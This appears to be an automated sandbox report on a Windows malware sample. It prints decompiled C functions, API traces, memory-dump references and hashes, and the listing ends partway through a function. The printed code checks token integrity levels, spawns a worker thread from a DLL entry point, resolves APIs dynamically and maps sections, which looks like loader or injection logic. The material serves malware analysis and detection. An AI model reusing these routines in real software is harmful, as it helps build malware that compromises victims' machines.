_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 044B84B4
_snwprintf.NTDLL ref: 044B84D9
CreateFileMappingW.KERNELBASE(000000FF,044BD2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 044B84F5
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,044B1F23,?,?,4D283A53,?), ref: 044B8507
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 044B851E
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,044B1F23,?,?,4D283A53), ref: 044B853F
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,044B1F23,?,?,4D283A53,?), ref: 044B8547

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: a8692612c1d9f3206a0008d175bf2398fd5e2adbd8491e45269e1fd9c3ff4501
Instruction ID: ee80859c6f17e2e5525fdcd48ae8a5cfd61001fbd1dbabbe70ee38f6198febbf
Opcode Fuzzy Hash: a8692612c1d9f3206a0008d175bf2398fd5e2adbd8491e45269e1fd9c3ff4501
Instruction Fuzzy Hash: 5721C372600604BBEB21ABA8DC85FCE77ADEB44750F248126F645E7280E674E9058BE0

Uniqueness

Uniqueness Score: -1.00%

Function 044B4800, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B4800(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x44bd25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E044B6D10(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E044B45B3(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x044b480d
0x044b4814
0x044b481b
0x044b482f
0x044b483a
0x044b4852
0x044b485f
0x044b4862
0x044b4867
0x044b4872
0x044b4876
0x044b4885
0x044b4889
0x044b48a5
0x044b48a5
0x044b48a9
0x044b48a9
0x044b48ae
0x044b48b2
0x044b48b8
0x044b48b9
0x044b48c0
0x044b48c6

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 044B4832
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 044B4852
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 044B4862
CloseHandle.KERNEL32(00000000), ref: 044B48B2

Part of subcall function 044B6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,044B5D29), ref: 044B6D1C

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 044B4885
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 044B488D
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 044B489D

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 8eec1363e0e873fba83dad888d62cb525bd9812251e67f2f595fa28e86f837ac
Instruction ID: cc0d1b58b72dce4d17e59fc1353af824a658b634de543d5ff02dfeaa16a86b07
Opcode Fuzzy Hash: 8eec1363e0e873fba83dad888d62cb525bd9812251e67f2f595fa28e86f837ac
Instruction Fuzzy Hash: AA213CB9900659FFEF009F94DC84DEEBBB9EF48304F1040A6EA50A6291C7759E05DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401815, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x404108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x40410c;
						if( *0x40410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x404118;
								if( *0x404118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x40410c);
						}
						HeapDestroy( *0x404110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x404108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x404110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x404130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E00401EFF, E0040122C(_a12, 0, 0x404118, _t41), 0,  &_a8); // executed
							 *0x40410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x00401818
0x00401824
0x00401826
0x00401829
0x004018a3
0x004018a9
0x004018ab
0x004018ad
0x004018b3
0x004018b5
0x004018ba
0x004018bd
0x004018c8
0x004018ca
0x00000000
0x00000000
0x004018cc
0x004018cf
0x004018d1
0x00000000
0x00000000
0x00000000
0x004018d1
0x004018d9
0x004018d9
0x004018e5
0x004018e5
0x0040182b
0x0040182c
0x0040184c
0x00401852
0x00401857
0x00401859
0x00401899
0x00401899
0x0040185b
0x00401863
0x0040186a
0x00401883
0x00401889
0x00401890
0x00401895
0x00000000
0x00401895
0x00401890
0x00401859
0x0040182c
0x004018f2

APIs

InterlockedIncrement.KERNEL32(00404108), ref: 00401837
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0040184C
CreateThread.KERNELBASE ref: 00401883
InterlockedDecrement.KERNEL32(00404108), ref: 004018A3
SleepEx.KERNEL32(00000064,00000001), ref: 004018BD
CloseHandle.KERNEL32 ref: 004018D9
HeapDestroy.KERNEL32 ref: 004018E5

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
String ID:
API String ID: 3416589138-0
Opcode ID: 4fafe4bfec00b34c7ab650cae6d978af966e6983ff02ed69db01c180710ff68d
Instruction ID: 5f53c93a26ac52311a3bf227c6f76573e3cc768b6fe1fcb1971bc4373739f462
Opcode Fuzzy Hash: 4fafe4bfec00b34c7ab650cae6d978af966e6983ff02ed69db01c180710ff68d
Instruction Fuzzy Hash: FC21A772601214ABC710EF69ED8892B7BB8F7D5751714853AFA01F62B0D7788E409B58

Uniqueness

Uniqueness Score: -1.00%

Function 00400318, Relevance: 10.1, APIs: 6, Instructions: 1069timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00401013
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401029
_snwprintf.NTDLL ref: 0040104E
CreateFileMappingW.KERNELBASE(000000FF,00404148,00000004,00000000,?,?), ref: 00401073
GetLastError.KERNEL32 ref: 0040108A
CloseHandle.KERNEL32(00000000), ref: 004010BF

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: FileTime$CloseCreateErrorHandleLastMappingSystem_aulldiv_snwprintf
String ID:
API String ID: 3907817403-0
Opcode ID: ddbec081ea5fefb6f3df52c03dd1df9c6f30cb72744891a8f051b37b11182228
Instruction ID: 0445f311b2d474faee538cb982a07a1a61831fd0cac912dcbae288582be080be
Opcode Fuzzy Hash: ddbec081ea5fefb6f3df52c03dd1df9c6f30cb72744891a8f051b37b11182228
Instruction Fuzzy Hash: E211B4B2A00248BFC711AFA4DC84EDE3BB8DB55351F104176F605FB1E1D27899848B69

Uniqueness

Uniqueness Score: -1.00%

Function 044B3DCD, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 044B3E08
IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 044B3E8B
StrStrIW.SHLWAPI(00000000,006E0069), ref: 044B3ECB
SysFreeString.OLEAUT32(00000000), ref: 044B3EED

Part of subcall function 044B4B71: SysAllocString.OLEAUT32(044BC298), ref: 044B4BC1

SafeArrayDestroy.OLEAUT32(00000000), ref: 044B3F40
SysFreeString.OLEAUT32(00000000), ref: 044B3F4F

Part of subcall function 044B3B9B: Sleep.KERNELBASE(000001F4), ref: 044B3BE3

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 5dd5f63a16b3cd72f2400f19133369d7a09bea583cf29f81033db05d3a827256
Instruction ID: 7cc7b53b3da1bd009dc23bc98f81942c10ec4f1a362530f8d3e3c969b75cef63
Opcode Fuzzy Hash: 5dd5f63a16b3cd72f2400f19133369d7a09bea583cf29f81033db05d3a827256
Instruction Fuzzy Hash: DB514135900609EFDF01CFA9C884ADAB7B5FF88700B14886AE945DB210DB75ED06CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401C1F, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401C1F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E0040163D(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x404144 + 0x405014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x404144 + 0x40514c);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00401628(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x404144 + 0x40515c);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x404144 + 0x40516f);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x404144 + 0x405184);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x404144 + 0x40519a); // executed
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00401E57(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00401c2e
0x00401c32
0x00401cf4
0x00401c38
0x00401c50
0x00401c5f
0x00401c66
0x00401c68
0x00401c6d
0x00401cec
0x00401ced
0x00401c6f
0x00401c7c
0x00401c7e
0x00401c83
0x00000000
0x00401c85
0x00401c92
0x00401c94
0x00401c99
0x00000000
0x00401c9b
0x00401ca8
0x00401caa
0x00401caf
0x00000000
0x00401cb1
0x00401cbe
0x00401cc0
0x00401cc5
0x00000000
0x00401cc7
0x00401ccd
0x00401cd2
0x00401cd9
0x00401cde
0x00401ce3
0x00000000
0x00401ce5
0x00401ce8
0x00401ce8
0x00401ce3
0x00401cc5
0x00401caf
0x00401c99
0x00401c83
0x00401c6d
0x00401d02

APIs

Part of subcall function 0040163D: HeapAlloc.KERNEL32(00000000,?,0040191A,00000208,?,-00000008,?,?,?,00401F72,?), ref: 00401649

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,0040117B,?,?,?), ref: 00401C44
GetProcAddress.KERNEL32(00000000,?), ref: 00401C66
GetProcAddress.KERNEL32(00000000,?), ref: 00401C7C
GetProcAddress.KERNEL32(00000000,?), ref: 00401C92
GetProcAddress.KERNEL32(00000000,?), ref: 00401CA8
GetProcAddress.KERNEL32(00000000,?), ref: 00401CBE

Part of subcall function 00401E57: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000), ref: 00401EB4
Part of subcall function 00401E57: memset.NTDLL ref: 00401ED6

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 126b1a768074e702a1b667d541028337005a855e190515a99fcb586497d86a04
Instruction ID: 509b811521b9461cd305b380749a6b9b9baf54666e807ec608f2a2123b03ebcd
Opcode Fuzzy Hash: 126b1a768074e702a1b667d541028337005a855e190515a99fcb586497d86a04
Instruction Fuzzy Hash: 692119B060060AAFE710DFA9CD84E6BB7ECEB54304704447AE909EB261D774E905CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 044BA5F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E044BA5F5(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E044B6D10(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x44bc28c); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x44bc28c);
						}
						_t2 = _t27 + 0x10; // 0x4d283a53
						 *( *_t2 + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					_t6 = _t27 + 0x10; // 0x4d283a53
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
				}
				return 0;
			}

0x044ba600
0x044ba604
0x044ba606
0x044ba607
0x044ba60f
0x044ba60f
0x044ba613
0x00000000
0x00000000
0x044ba60a
0x044ba60b
0x044ba60e
0x044ba60e
0x044ba61b
0x044ba620
0x044ba626
0x044ba62e
0x044ba634
0x044ba636
0x044ba63b
0x044ba63f
0x044ba641
0x044ba644
0x044ba64b
0x044ba64b
0x044ba651
0x044ba655
0x044ba658
0x044ba659
0x044ba65b
0x044ba663
0x044ba667
0x044ba667
0x044ba674

APIs

StrChrA.SHLWAPI(?,00000020,00000000,04D895AC,?,?,?,044B5027,04D895AC,?,?,?,044B2018,?,?,?), ref: 044BA60F
StrTrimA.KERNELBASE(?,044BC28C,00000002,?,?,?,044B5027,04D895AC,?,?,?,044B2018,?,?,?,4D283A53), ref: 044BA62E
StrChrA.SHLWAPI(?,00000020,?,?,?,044B5027,04D895AC,?,?,?,044B2018,?,?,?,4D283A53,?), ref: 044BA639
StrTrimA.SHLWAPI(00000001,044BC28C,?,?,?,044B5027,04D895AC,?,?,?,044B2018,?,?,?,4D283A53,?), ref: 044BA64B

Strings

S:(M, xrefs: 044BA651, 044BA663

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID: S:(M
API String ID: 3043112668-2217774225
Opcode ID: e80ad59c8a491d5474b4aea78dd833924c52fb55d7814478f6c89a68a94bdca5
Instruction ID: 568bcde2ba6fb2d22342d32b7db1b9b442ab91e01aadc0ede80abc7d0354ce2f
Opcode Fuzzy Hash: e80ad59c8a491d5474b4aea78dd833924c52fb55d7814478f6c89a68a94bdca5
Instruction Fuzzy Hash: 3501D8B1A053229BD6319E798C88F67BF98EF55A91F11051AF9C1E7341DB60EC0286F4

Uniqueness

Uniqueness Score: -1.00%

Function 044B1E95, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E044B1E95(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E044B4D5D();
				if(_t21 != 0) {
					_t59 =  *0x44bd25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x44bd25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x44bd164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E044B86DB( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x44bd2a4; // 0x8ca5a8
					if( *0x44bd25c > 5) {
						_t8 = _t26 + 0x44be5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x44be9f3; // 0x44283a44
						_t27 = _t7;
					}
					E044B5136(_t27, _t27);
					_t31 = E044B8492(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x44bd270 =  *0x44bd270 ^ 0x81bbe65d;
						_t32 = E044B6D10(0x60);
						 *0x44bd324 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x44bd324; // 0x4d895b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x44bd324; // 0x4d895b0
							 *_t51 = 0x44be845;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x44bd238, 0, 0x43);
							 *0x44bd2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x44bd25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x44bd2a4; // 0x8ca5a8
								_t13 = _t58 + 0x44be55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x44bc28f);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E044B65CE( ~_v8 &  *0x44bd270, 0x44bd00c); // executed
								_t42 = E044BA22C(0, _t55, _t63, 0x44bd00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E044B8557(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E044B6130(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E044B6810(__eflags,  &(_t67[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x44bd160();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E044B5C56(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x044b1e95
0x044b1e9f
0x044b1ea2
0x044b1ea5
0x044b1ea8
0x044b1eaf
0x044b1eb1
0x044b1ebd
0x044b1ebf
0x044b1ebf
0x044b1ec8
0x044b1ece
0x044b1ed3
0x044b1eed
0x044b1ef9
0x044b1efb
0x044b1f00
0x044b1f0a
0x044b1f0a
0x044b1f02
0x044b1f02
0x044b1f02
0x044b1f02
0x044b1f11
0x044b1f1e
0x044b1f25
0x044b1f2a
0x044b1f2a
0x044b1f33
0x044b1f36
0x044b1f5c
0x044b1f68
0x044b1f6d
0x044b1f72
0x044b1f74
0x044b1fa0
0x044b1fa2
0x044b1f76
0x044b1f7a
0x044b1f7f
0x044b1f84
0x044b1f8b
0x044b1f91
0x044b1f96
0x044b1f9c
0x044b1fa3
0x044b1fa5
0x044b1fa7
0x044b1fb6
0x044b1fbc
0x044b1fc1
0x044b1fc3
0x044b1ff3
0x044b1ff5
0x044b1fc5
0x044b1fc5
0x044b1fcb
0x044b1fd8
0x044b1fde
0x044b1fde
0x044b1fe6
0x044b1fef
0x044b1ff6
0x044b1ff8
0x044b1ffa
0x044b2001
0x044b200e
0x044b2013
0x044b2018
0x044b201a
0x044b201c
0x00000000
0x00000000
0x044b201e
0x044b2023
0x044b2025
0x044b202c
0x044b2030
0x044b2033
0x044b2048
0x044b204c
0x044b2051
0x00000000
0x044b2051
0x044b2035
0x044b2037
0x00000000
0x00000000
0x044b203d
0x044b2042
0x044b2044
0x044b2046
0x00000000
0x00000000
0x00000000
0x044b2046
0x044b2029
0x044b2029
0x044b1ffa
0x044b1f38
0x044b1f38
0x044b1f3d
0x044b2053
0x044b2058
0x044b2060
0x044b2060
0x00000000
0x044b2058
0x044b1f43
0x044b1f46
0x044b1f50
0x044b1f57
0x00000000
0x044b2068
0x044b2068
0x044b206b
0x044b206f
0x044b206f

APIs

Part of subcall function 044B4D5D: GetModuleHandleA.KERNEL32(4C44544E,00000000,044B1EAD,00000001), ref: 044B4D6C

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 044B1F2A

Part of subcall function 044B6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,044B5D29), ref: 044B6D1C

memset.NTDLL ref: 044B1F7A
RtlInitializeCriticalSection.NTDLL(04D89570), ref: 044B1F8B

Part of subcall function 044B6810: memset.NTDLL ref: 044B682A
Part of subcall function 044B6810: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 044B6861
Part of subcall function 044B6810: StrCmpNIW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,044B2042), ref: 044B686C

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 044B1FB6
wsprintfA.USER32 ref: 044B1FE6

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: d17e37ae6164841df05bb3b76c94024925cacb8aa7eb48f391acee4fab95511b
Instruction ID: f3a8331c6fcc43a898e1e3ea604748fab5cbd902a0e6468d3683861cbf441400
Opcode Fuzzy Hash: d17e37ae6164841df05bb3b76c94024925cacb8aa7eb48f391acee4fab95511b
Instruction Fuzzy Hash: 205186B1E00615ABFF259BA4DC88BDF77A8EB04744F10449BE181D7241E7B4B905CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 044B6810, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 157
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E044B6810(void* __eflags, WCHAR* _a4) {
				char _v40;
				char _v44;
				void _v48;
				int _v52;
				char _v56;
				char _v60;
				void* _v64;
				char _v68;
				intOrPtr _v72;
				int _v76;
				WCHAR* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				char _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t81;
				WCHAR* _t90;

				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_v76 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x44bd2a4; // 0x8ca5a8
				_t5 = _t40 + 0x44bee14; // 0x410025
				_t90 = E044B90A5(_t5);
				_v84 = _t90;
				if(_t90 == 0) {
					_t81 = 8;
					L24:
					return _t81;
				}
				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
				if(_t45 != 0) {
					_t81 = 1;
					L22:
					E044B45B3(_v88);
					goto L24;
				}
				if(E044B3A8E(0,  &_v96) != 0) {
					_v96 = 0;
				}
				_t50 = E044BA5A3(0,  *0x44bd33c);
				_v96 = _t50;
				if(_t50 == 0) {
					_t81 = 8;
					goto L19;
				} else {
					_t52 =  *0x44bd2a4; // 0x8ca5a8
					_t11 = _t52 + 0x44be81a; // 0x65696c43
					_t55 = E044BA5A3(0, _t11);
					_t93 = _t55;
					if(_t55 == 0) {
						_t81 = 8;
					} else {
						_t81 = E044B424B(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
						E044B45B3(_t93);
					}
					if(_t81 != 0) {
						L17:
						E044B45B3(_v92);
						L19:
						_t92 = _v96;
						if(_v96 != 0) {
							E044B3B83(_t92);
						}
						goto L22;
					} else {
						if(( *0x44bd260 & 0x00000001) == 0) {
							L14:
							E044B3712(_t81, _v60, _v56,  *0x44bd270, 0);
							_t81 = E044B582F(_v72,  &_v64,  &_v60, 0);
							if(_t81 == 0) {
								_v68 = _v96;
								_v64 =  &_v60;
								_t81 = E044B8F5F( &_v84, 0);
							}
							E044B45B3(_v60);
							goto L17;
						}
						_t67 =  *0x44bd2a4; // 0x8ca5a8
						_t18 = _t67 + 0x44be823; // 0x65696c43
						_t70 = E044BA5A3(0, _t18);
						_t95 = _t70;
						if(_t70 == 0) {
							_t81 = 8;
						} else {
							_t22 =  &_v96; // 0x65696c43
							_t81 = E044B424B( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
							E044B45B3(_t95);
						}
						if(_t81 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

0x044b6826
0x044b682a
0x044b6831
0x044b6839
0x044b683a
0x044b683b
0x044b683c
0x044b683d
0x044b683e
0x044b6846
0x044b6852
0x044b6854
0x044b685a
